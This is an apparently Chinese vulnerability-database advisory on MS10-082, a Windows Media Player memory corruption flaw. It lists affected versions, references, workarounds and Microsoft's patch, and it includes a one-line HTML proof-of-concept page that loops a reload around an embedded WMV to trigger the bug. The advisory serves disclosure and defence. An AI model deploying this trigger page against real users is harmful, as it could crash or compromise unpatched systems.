Microsoft Windows Media Player重新加载操作内存破坏漏洞(MS10-082)
- 发表于
- Vulndb
发布时间:2010-10-12
影响版本:
Microsoft Windows Media Player 9.0
Microsoft Windows Media Player 12
Microsoft Windows Media Player 11
Microsoft Windows Media Player 10.0
漏洞描述:
Windows Media Player是微软操作系统中默认捆绑的媒体播放器。
Windows Media Player在重新加载操作过程中通过Web浏览器取消分配对象的方式中存在内存破坏漏洞。如果用户访问特制网页,此漏洞可能允许远程执行代码。如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。
<*参考
http://secunia.com/advisories/41779/
http://code.google.com/p/skylined/issues/detail?id=21
http://www.microsoft.com/technet/security/bulletin/MS10-082.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA10-285A.html
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html> <body onload="setTimeout('location.reload()', 1000);"> <embed type="application/x-mplayer2" src="file.wmv"></embed> </body> </html>
安全建议:
临时解决方法:
* 注销wmp.dll
对于32位Windows:
Regsvr32.exe –u %WINDIR%\system32\wmp.dll
对于64位Windows:
Regsvr32.exe –u %WINDIR%\system32\wmp.dll
Regsvr32.exe –u %WINDIR%\syswow64\wmp.dll
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS10-082)以及相应补丁:
MS10-082:Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)
链接:http://www.microsoft.com/technet/security/bulletin/MS10-082.mspx?pf=true
原文连接
的情况下转载,若非则不得使用我方内容。